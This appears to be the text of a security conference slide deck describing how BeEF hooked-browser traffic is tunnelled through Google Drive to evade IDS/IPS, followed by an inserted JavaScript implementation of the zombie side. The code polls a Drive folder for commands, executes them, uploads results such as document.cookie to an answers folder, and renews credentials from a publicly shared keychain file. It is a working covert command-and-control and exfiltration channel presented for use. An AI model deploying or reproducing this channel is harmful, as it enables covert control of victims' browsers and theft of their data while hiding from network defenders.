Hooked-browser network with BeEF and Google Drive
Post-exploitation 


After exploiting a vulnerability and taking control
of the victim's system, the intruder has to
establish communication between the hooked browser
and the C&C server.


Common communication channels in web
applications are:

• XMLHttpRequest

• WebSockets

• WebRTC
Prehistory


Not long ago Christian Frichot (aka @xntrik) presented the
BeEF WebRTC extension in his talk at Kiwicon 2014:

"One of the biggest issues with BeEF is that each hooked
browser has to talk to your BeEF server. To try and avoid
detection, you often want to try and obfuscate or hide
your browsers. Using this bleeding-edge web technology,
we can now mesh all those hooked browsers, tunneling
all your BeEF comms through a single sacrificial
beachhead."
Not totally invisible


The last direct communication channel (from the
beachhead to the BeEF server) can still be tracked or
blocked by an IDS/IPS, so we decided to find a way
to get rid of it.



The main idea is to use some trusted
server as the communication channel, reached over
ordinary XHR/WS, as is done in projects like:

• Gcat

• Twittor
Our previous research


Our team has researched a new type of covert timing
channel based on HTTP cache-control headers, and a
couple of ways to implement it in different environments.

One of those environments was Google Drive, so we
decided to use it as a communication channel once
more.
We need a cloud


Sometimes BeEF needs to send a really large
amount of data, so why not use something
that is designed for exactly that?
Cloud storage services like Google Drive or
Dropbox are trusted (not flagged as
suspicious activity) in most networks and
have a nice API for working with them from
JavaScript.
Under BeEF's hood

Let's understand what's going on inside BeEF.
The BeEF server consists of two parts:

• Command server: does all the work with zombies

• UI server: used by the intruder, and makes BeEF look awesome
Intruder → BeEF server → zombie browser: hook.js forces
the browser to do the bad things.
Command server details

The command server can be viewed as a bunch of handlers, each of which
does its own job:

• '/init' handler: processes the information from new zombies
  (the zombie sends its browser details)

• '/event' handler: stores the logs sent by zombies

• '/' handler: provides new commands
  (the zombie polls it to get new commands)

• Command handlers: separate handlers that process the results
  of each command (the zombie sends its results)
The beginning of indirect communication

As we can see, BeEF is designed as a common
network application with an active client and
a passive server.

So first of all we should teach the
server to talk with zombies via the cloud, using
a polling model.
Server side (polling via Google Drive):

• Get the initial information about newly arrived zombies

• Send commands to the zombie browsers

• Trash old files, empty the trash
Indirect communication on the client side

Drive folders: Init, Answers, Zombie1, Zombie2

• Send the browser details as the first request to the
  server

• Pull commands from its own folder and move read
  commands to the trash
One more thing is access

To perform actions via the Google Drive API we need three different keys:

• Auth key: used by the client and the server to perform any
  write access on Google Drive

• API key: used by the client to read the renewed Auth key
  from a special keychain file

• Master key: used by the server to update the Auth key
  via OAuth
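As an added example covering both the client-side slide and the three-key scheme (this is not code from the beef-drive project or from BeEF itself): a zombie's polling loop written against the Google Drive v3 REST API, plus the step where a zombie whose Auth key has expired reads the renewed key from the public keychain file using only the API key. It runs against a constructed in-memory stand-in for Drive so it works offline; the folder and file IDs, the tokens "ya29.current" and "ya29.expired", the API key value and the `exec` callback are assumed demo values, not values from the project.

```javascript
// Added example, not code from beef-drive or BeEF: a zombie's Drive polling loop over
// the Google Drive v3 REST API, plus renewal of an expired Auth key from the public
// keychain file using the API key. IDs, tokens, API key and exec are demo values.
const FILES = "https://www.googleapis.com/drive/v3/files";
const UPLOAD = "https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart";

// multipart/related upload body: JSON metadata part, then the content part.
function multipartBody(b, metadata, content) {
  return [`--${b}`, "Content-Type: application/json; charset=UTF-8", "", JSON.stringify(metadata),
    `--${b}`, "Content-Type: text/plain", "", content, `--${b}--`].join("\r\n");
}

class DriveZombie {
  // cfg: token (Auth key), apiKey + keychainId (to read the renewed Auth key),
  // folderId (own command folder), answersFolderId, fetchImpl, exec (runs a command).
  constructor(cfg) { Object.assign(this, cfg); }
  async call(url, opts = {}) {
    const send = () => this.fetchImpl(url, { ...opts, headers: { Authorization: `Bearer ${this.token}`, ...opts.headers } });
    let r = await send();
    if (r.status === 401) { await this.refreshToken(); r = await send(); } // Auth key expired: renew, retry once
    if (r.status !== 200) throw new Error(`Drive request failed: ${r.status}`);
    return r;
  }
  async refreshToken() {
    // The keychain file is shared publicly, so the API key alone is enough to read it.
    const r = await this.fetchImpl(`${FILES}/${this.keychainId}?alt=media&key=${this.apiKey}`);
    if (r.status !== 200) throw new Error("keychain file unreadable");
    this.token = (await r.text()).trim();
  }
  async listCommands() {
    // Pending commands are the untrashed files in this zombie's own folder.
    const q = encodeURIComponent(`'${this.folderId}' in parents and trashed = false`);
    return (await (await this.call(`${FILES}?q=${q}&fields=files(id,name)`)).json()).files;
  }
  async download(id) { return (await this.call(`${FILES}/${id}?alt=media`)).text(); }
  async trash(id) { // "move read commands to the trash": PATCH trashed=true, not a hard delete
    await this.call(`${FILES}/${id}`, { method: "PATCH", headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ trashed: true }) });
  }
  async upload(name, content) {
    const b = "beef_drive_boundary";
    await this.call(UPLOAD, { method: "POST", headers: { "Content-Type": `multipart/related; boundary=${b}` },
      body: multipartBody(b, { name, parents: [this.answersFolderId] }, content) });
  }
  // One poll: pull commands, run them, upload results to the answers folder, trash the commands.
  async pollOnce() {
    const done = [];
    for (const f of await this.listCommands()) {
      await this.upload(`${f.name}.result`, this.exec(await this.download(f.id)));
      await this.trash(f.id);
      done.push(f.name);
    }
    return done;
  }
}

// Constructed in-memory stand-in for Drive; it only understands the request shapes used above.
function makeFakeDrive(seed, token, apiKey) {
  const store = new Map(seed.map((f) => [f.id, { trashed: false, ...f }]));
  let nextId = 1000;
  const reply = (status, obj) => ({ status, json: async () => obj, text: async () => String(obj) });
  const fetchImpl = async (url, opts = {}) => {
    const u = new URL(url), file = store.get(u.pathname.split("/").pop());
    if (u.searchParams.get("key") === apiKey && file && file.public) return reply(200, file.content);
    if ((opts.headers || {}).Authorization !== `Bearer ${token}`) return reply(401, { error: "unauthorized" });
    if (u.pathname === "/upload/drive/v3/files") {
      const b = opts.headers["Content-Type"].split("boundary=")[1];
      const parts = opts.body.split(`--${b}`).slice(1, -1).map((p) => p.slice(p.indexOf("\r\n\r\n") + 4).replace(/\r\n$/, ""));
      const meta = JSON.parse(parts[0]), id = String(nextId++);
      store.set(id, { id, ...meta, content: parts[1], trashed: false });
      return reply(200, meta);
    }
    if (u.pathname === "/drive/v3/files") {
      const folder = /'([^']+)' in parents/.exec(u.searchParams.get("q"))[1];
      return reply(200, { files: [...store.values()].filter((f) => (f.parents || []).includes(folder) && !f.trashed)
        .map(({ id, name }) => ({ id, name })) });
    }
    if (opts.method === "PATCH" && file) { Object.assign(file, JSON.parse(opts.body)); return reply(200, {}); }
    if (u.searchParams.get("alt") === "media" && file) return reply(200, file.content);
    return reply(404, {});
  };
  return { fetchImpl, store };
}

// Demo: zombie1 holds a valid Auth key; zombie2 starts with a stale one and recovers the
// current one from the keychain file before pulling its own command.
async function demo() {
  const drive = makeFakeDrive([
    { id: "keychain", name: "keychain.txt", public: true, content: "ya29.current\n" },
    { id: "c1", name: "cmd-1", parents: ["folder-zombie1"], content: "navigator.userAgent" },
    { id: "c2", name: "cmd-2", parents: ["folder-zombie1"], content: "document.cookie" },
    { id: "c3", name: "cmd-3", parents: ["folder-zombie2"], content: "location.href" },
  ], "ya29.current", "AIza-demo-key");
  const cfg = { token: "ya29.current", apiKey: "AIza-demo-key", keychainId: "keychain",
    answersFolderId: "folder-answers", fetchImpl: drive.fetchImpl, exec: (src) => `ran:${src}` };
  const z1 = new DriveZombie({ ...cfg, folderId: "folder-zombie1" });
  const z2 = new DriveZombie({ ...cfg, folderId: "folder-zombie2", token: "ya29.expired" });
  const done1 = await z1.pollOnce(), done2 = await z2.pollOnce();
  return { done1, done2, renewedToken: z2.token, store: drive.store };
}
```

Call `demo()`; it resolves with the commands each zombie ran, the Auth key zombie2 ended up with after the 401/renew/retry cycle, and the fake store, where the `.result` files sit in the answers folder and the three command files are trashed. Two points worth noticing: the zombie never hard-deletes anything (the server empties the trash), and the keychain file has to be readable with nothing but an API key, i.e. shared publicly, so whoever finds that file also gets the current Auth key.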
Proof of Concept: https://youtu.be/ RfBUEcvynM


https://github.com/tsu-iscd/beef-drive 
Thank you for your attention!